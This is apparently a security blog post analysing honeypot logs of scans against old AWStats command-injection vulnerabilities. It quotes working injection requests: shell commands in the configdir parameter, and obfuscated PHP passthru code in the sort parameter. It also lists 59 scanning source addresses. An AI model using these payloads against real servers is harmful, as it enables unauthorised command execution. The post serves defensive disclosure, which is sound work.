Issue Detected

Our daily web honeypot analysis has detected an increase in scanning looking for command injection flaws in the Awstats package.  Here are example attacks from the logs:

GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.0
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.1
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1
GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0
GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1
GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0
GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1

According to OSVDB - there are two different vulnerabilities that they are probing for:

• 13002 : AWStats awstats.pl configdir Parameter Arbitrary Command Execution
• 47807 : AWStats Totals awstatstotals.php multisort() Function sort Parameter Arbitrary PHP Code Execution

Both of these vulnerability disclosures are old (2005 and 2008) so we are unsure why there is a sudden uptick in scanning.  If you are running Awstats software, you should make sure you are updated: http://awstats.sourceforge.net/

Scanning Source Information

The scanning came from 59 different IP address (a few are resolved to hostnames) -

114.32.226.22
118.122.178.65
118.97.50.11
121.166.70.252
122.255.96.164
122.255.96.45
151.1.183.216
159.213.90.53
162-119-162-69.reverse.lstn.net
180.76.5.49
180.76.5.91
187.45.213.158
190.40.2.40
190.95.200.250
200.175.53.196
202.100.80.21
202.28.37.63
203.142.24.17
211.144.82.8
211.167.110.2
212.252.120.11
212.49.222.82
212.92.13.110
213.195.75.188
219.94.144.230
220.162.244.251
220.179.64.23
58.254.143.204
58.254.202.103
58.63.241.209
59.108.108.100
59.163.254.18
61.19.45.119
62.183.105.164
62.225.155.90
65.255.176.26
67.55.95.132
68.78.199.247
69.162.119.162
78.131.55.172
80.248.214.103
81.169.165.138
81.92.159.194
82.193.36.98
82.228.250.163
85.18.206.228
85.88.195.34
85.88.195.35
87.242.99.166
88.173.34.144
88.40.179.242
89-97-247-147.ip2.fastwebnet.it
89.208.95.130
93.84.116.216
95.87.194.7
byr09a.trigger.co.za
mail.gymnaziumdc.cz
mail.ring.hu
pd5cdac.szokff01.ap.so-net.ne.jp

While there were a number of different source IP addresses used, all of the requests had the exact same User-Agent string: 

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0.

This leads us to believe that the attack was carried about by the same source client.